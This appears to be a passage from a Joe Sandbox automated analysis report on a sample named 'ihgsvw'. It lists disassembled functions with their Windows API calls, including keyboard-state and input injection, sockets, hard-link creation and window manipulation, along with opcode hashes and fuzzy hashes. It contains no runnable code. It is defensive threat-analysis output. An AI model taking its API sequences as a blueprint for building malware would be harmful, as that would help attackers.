                • API String ID: 2326795674-1439706946
                • Opcode ID: 7dd6358509886d93e62439e8de35859eb6a13a46254ac82e2a44bf599e758746
                • Instruction ID: b7b7c61a7edef4d69a228f22b31c693c6aaa34e73c47f7aab51897f67a546f93
                • Opcode Fuzzy Hash: 7dd6358509886d93e62439e8de35859eb6a13a46254ac82e2a44bf599e758746
                • Instruction Fuzzy Hash: 5E21A132610219AFDF258F90CC46FEE3BB9EF48714F150214FA15AB1D0D6B1B895DB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C34116 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00C3419F
                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00C341AF
                • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00C341D5
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: MessageSend$MoveWindow
                • String ID: Listbox
                • API String ID: 3315199576-2633736733
                • Opcode ID: 9fd97a8acaeb87d8c8ffb2dcb556b9710b21d60198152731afe07a78d88beec4
                • Instruction ID: 2e11ec4cec4d4139aff3af1c3dca861039e50f913e7712c0a935bd832592df1e
                • Opcode Fuzzy Hash: 9fd97a8acaeb87d8c8ffb2dcb556b9710b21d60198152731afe07a78d88beec4
                • Instruction Fuzzy Hash: E1219232660218BBEF258F54DC85FEF377EEF99754F108114F9159B190C671AC9287A0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C1534E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                Download Yara Rule
                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 00C15362
                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C153B6
                • SetErrorMode.KERNEL32(00000000,?,?,00C3DCD0), ref: 00C1542A
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ErrorMode$InformationVolume
                • String ID: %lu
                • API String ID: 2507767853-685833217
                • Opcode ID: 7ae8eefeaaa189bb3613218d351315fb5ad14c64a5f418ee9b08440ae90637bd
                • Instruction ID: 00cdaee9073f309796c51fcd17b8d11489743d3a1661366508f1cb249a91f8b2
                • Opcode Fuzzy Hash: 7ae8eefeaaa189bb3613218d351315fb5ad14c64a5f418ee9b08440ae90637bd
                • Instruction Fuzzy Hash: 57315371A00109AFD710EF64D985EAE77F8EF09304F1480A5F509DB262DB71EE45DB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C361E1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                Download Yara Rule
                APIs
                • GetMenuItemInfoW.USER32 ref: 00C36220
                • SetMenuItemInfoW.USER32 ref: 00C3624D
                • DrawMenuBar.USER32(?,?,00000030,?,00000030), ref: 00C3625C
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Menu$InfoItem$Draw
                • String ID: 0
                • API String ID: 3227129158-4108050209
                • Opcode ID: e9ea7e5f4c69c10196c5e28a9c44d6715880dd3354bf4cfe4d63c4feaee9c604
                • Instruction ID: 21d6b4ee3e965e124c8eafa6b34287e1a8ce799e4c3f5891b64b798dbccfc936
                • Opcode Fuzzy Hash: e9ea7e5f4c69c10196c5e28a9c44d6715880dd3354bf4cfe4d63c4feaee9c604
                • Instruction Fuzzy Hash: A0016971620218EFDB209F52DC88FAEBBB4FF44351F148099F84AE6151DB718A94EF21
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BFE72A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMON
                Download Yara Rule
                APIs
                • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00BFE73D
                • FreeLibrary.KERNEL32 ref: 00BFE763
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: AddressFreeLibraryProc
                • String ID: GetSystemWow64DirectoryW$X64
                • API String ID: 3013587201-2590602151
                • Opcode ID: 5639b716d1e9a14da82fb515f8074d6ea78ef1d55da2d4088b3063e47a91600f
                • Instruction ID: 2479ddf1a848d5fdc0a13aa79da6920748fad48f8855523fa3f364bbfb01fbe6
                • Opcode Fuzzy Hash: 5639b716d1e9a14da82fb515f8074d6ea78ef1d55da2d4088b3063e47a91600f
                • Instruction Fuzzy Hash: 40E0487190252DE7C7725A109C88BBD31E4AF11B40F0405D4F612E7164DB74CD484794
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C0090F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d5d04d6384acc5b529c6c9e686ebca7237111bb90670066bba7fcb91390e85f0
                • Instruction ID: 001c63061ec22dd47451be7802c28522a8a506d62eeaad34c85fc1d837a6e1f3
                • Opcode Fuzzy Hash: d5d04d6384acc5b529c6c9e686ebca7237111bb90670066bba7fcb91390e85f0
                • Instruction Fuzzy Hash: 9DC14B75A0020AEFDB14CF94C894BAEB7B5FF48704F218598E516EB291D731EE81DB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BD4210 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: __alldvrm$_strrchr
                • String ID:
                • API String ID: 1036877536-0
                • Opcode ID: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
                • Instruction ID: 82cb4338aa43d5005b107d72788da49f5c53e66b324b4ac6deebc8f73d5dacd6
                • Opcode Fuzzy Hash: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
                • Instruction Fuzzy Hash: 51A114729002869FEB25CF58C8917AEFBE4EF55310F1841FEE5859B381EB748981CB54
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C22433 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                Download Yara Rule
                APIs
                • socket.WSOCK32(00000002,00000002,00000011), ref: 00C2245A
                • WSAGetLastError.WSOCK32 ref: 00C22468
                • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C224E7
                • WSAGetLastError.WSOCK32 ref: 00C224F1
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ErrorLast$socket
                • String ID:
                • API String ID: 1881357543-0
                • Opcode ID: 2a8565873ef02123c1ae711b74825bb07d0e829160c18452c7779433cfe3dda9
                • Instruction ID: 3f333ed7882d4bcf5641f05e4c00b015effb506acaf485a8b80d800f420cd837
                • Opcode Fuzzy Hash: 2a8565873ef02123c1ae711b74825bb07d0e829160c18452c7779433cfe3dda9
                • Instruction Fuzzy Hash: 0A41D074600210AFE720AF24D896F2A77E5EB05704F54C498F92A9F6D2C7B2ED418B90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C16033 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                Download Yara Rule
                APIs
                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C160DD
                • GetLastError.KERNEL32(?,00000000), ref: 00C16103
                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C16128
                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00C16154
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: CreateHardLink$DeleteErrorFileLast
                • String ID:
                • API String ID: 3321077145-0
                • Opcode ID: 8ef21383d83602cc51ce316e047bcc602d829d4f9004e398a1dd6cbfff88ab6f
                • Instruction ID: e6f21a700f1ebfaa22b2a80d2a9fc2fd59edacd5ea628664aa3857da90f4aed2
                • Opcode Fuzzy Hash: 8ef21383d83602cc51ce316e047bcc602d829d4f9004e398a1dd6cbfff88ab6f
                • Instruction Fuzzy Hash: 6A414939600610DFCB11EF15C454A5EBBE2EF8A720B198488EC5AAF362CB31FD41DB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C0B333 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                Download Yara Rule
                APIs
                • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00C0B388
                • SetKeyboardState.USER32(00000080), ref: 00C0B3A4
                • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00C0B412
                • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00C0B464
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: KeyboardState$InputMessagePostSend
                • String ID:
                • API String ID: 432972143-0
                • Opcode ID: 43ab3b92ac12d14d72c0f911f1e9893f035e7a8e6c80b02aa70df61f3a107431
                • Instruction ID: d26bf2591a83338bb8a7057b61c2df8a39eb9eb1fb048acce1ffa6bbd20b804f
                • Opcode Fuzzy Hash: 43ab3b92ac12d14d72c0f911f1e9893f035e7a8e6c80b02aa70df61f3a107431
                • Instruction Fuzzy Hash: 48315970A50318AEFF30CBA5C8057FEBBA5AF44710F14862AF0A5921E1C7748F45D7A2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C32039 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                Download Yara Rule
                APIs
                • GetForegroundWindow.USER32 ref: 00C3204A
                  • Part of subcall function 00C042CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C042E6
                  • Part of subcall function 00C042CC: GetCurrentThreadId.KERNEL32 ref: 00C042ED
                  • Part of subcall function 00C042CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C02E43), ref: 00C042F4
                • GetCaretPos.USER32(?), ref: 00C3205E
                • ClientToScreen.USER32(00000000,?), ref: 00C320AB
                • GetForegroundWindow.USER32 ref: 00C320B1
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                • String ID:
                • API String ID: 2759813231-0
                • Opcode ID: dd31398b493d1536bbf090bbaa1cc8de969947c72409598e3a5d652043020769
                • Instruction ID: cbcd7d003f5d199160f36d7c836b1b7c7be9a470f731a8e71b5ebd7e980badb4
                • Opcode Fuzzy Hash: dd31398b493d1536bbf090bbaa1cc8de969947c72409598e3a5d652043020769
                • Instruction Fuzzy Hash: FB315271E14109AFCB04DFAAC881DAEB7FCEF49304B1084AAE515E7211DA71DE45CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C0E7C1 Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00BA4154: _wcslen.LIBCMT ref: 00BA4159
                • _wcslen.LIBCMT ref: 00C0E7F7
                • _wcslen.LIBCMT ref: 00C0E80E
                • _wcslen.LIBCMT ref: 00C0E839
                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00C0E844
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: _wcslen$ExtentPoint32Text
                • String ID:
                • API String ID: 3763101759-0
                • Opcode ID: fdd3bc1a9d9849592a3dce698e259853c79c37cd6bc9ff48f63ce950ee18bd50
                • Instruction ID: 5de8145f1ed1e826dea6145f59584782c0593b4f65bc08dc856a0f2f5641f024
                • Opcode Fuzzy Hash: fdd3bc1a9d9849592a3dce698e259853c79c37cd6bc9ff48f63ce950ee18bd50
                • Instruction Fuzzy Hash: 9221A371D40214AFDB10AFA8C981BAEB7F8EF45750F1481A9F914FB291D7709E41C7A1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C330E1 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                Download Yara Rule
                APIs
                • GetWindowLongW.USER32(?,000000EC), ref: 00C33169
                • SetWindowLongW.USER32 ref: 00C33183
                • SetWindowLongW.USER32 ref: 00C33191
                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00C3319F
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Window$Long$AttributesLayered
                • String ID:
                • API String ID: 2169480361-0
                • Opcode ID: 9be411f8d65040680ff9e1599737f07c6dd7af42fd127b54487c0f92ca785a8f
                • Instruction ID: 2ac4079a115deedbb08584ae5859d61e79653a2c324f545b23a7da9f88d71c78
                • Opcode Fuzzy Hash: 9be411f8d65040680ff9e1599737f07c6dd7af42fd127b54487c0f92ca785a8f
                • Instruction Fuzzy Hash: CF21D031228551AFE7159B14CC44FAE7BA5EF86324F148158F46A8B2D2CB71EE82CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C08184 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00C0960C: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00C08199,?,000000FF,?,00C08FE3,00000000,?,0000001C,?,?), ref: 00C0961B
                  • Part of subcall function 00C0960C: lstrcpyW.KERNEL32 ref: 00C09641
                  • Part of subcall function 00C0960C: lstrcmpiW.KERNEL32(00000000,?,00C08199,?,000000FF,?,00C08FE3,00000000,?,0000001C,?,?), ref: 00C09672
                • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00C08FE3,00000000,?,0000001C,?,?,00000000), ref: 00C081B2
                • lstrcpyW.KERNEL32 ref: 00C081D8
                • lstrcmpiW.KERNEL32(00000002,cdecl,?,00C08FE3,00000000,?,0000001C,?,?,00000000), ref: 00C08213
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: lstrcmpilstrcpylstrlen
                • String ID: cdecl
                • API String ID: 4031866154-3896280584
                • Opcode ID: 8683848e2ae879e8cb259ac794221fdf4cd2dbca31082c8bf973d7b81d0064af
                • Instruction ID: 8424b891c92d337e8bfc06984b649f7f312b1dfd86f1046994f8c04ab9bf9c34
                • Opcode Fuzzy Hash: 8683848e2ae879e8cb259ac794221fdf4cd2dbca31082c8bf973d7b81d0064af
                • Instruction Fuzzy Hash: 1511087A200301ABCB146F34D845F7E77E9FF99350B50802AF986CB2A0EF329915D7A0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C38621 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                Download Yara Rule
                APIs
                • GetWindowLongW.USER32(?,000000F0), ref: 00C3866A
                • SetWindowLongW.USER32 ref: 00C38689
                • SetWindowLongW.USER32 ref: 00C386A1
                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00C1C10A,00000000), ref: 00C386CA
                  • Part of subcall function 00BA2441: GetWindowLongW.USER32(00000000,000000EB), ref: 00BA2452
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Window$Long
                • String ID:
                • API String ID: 847901565-0
                • Opcode ID: c09c8c4916a654769f68f957159e071e0499f67b6847c8530778c1803b76e212
                • Instruction ID: 2ee5d106bd2664fc0ecfbe198d5939a0d10c28d9814dcacdd15d581de1585f13
                • Opcode Fuzzy Hash: c09c8c4916a654769f68f957159e071e0499f67b6847c8530778c1803b76e212
                • Instruction Fuzzy Hash: 57117F72520715AFCB109F29DC09B6A3BB5EB45370F154724F939DB2E0DB309A59CB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BD2099 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
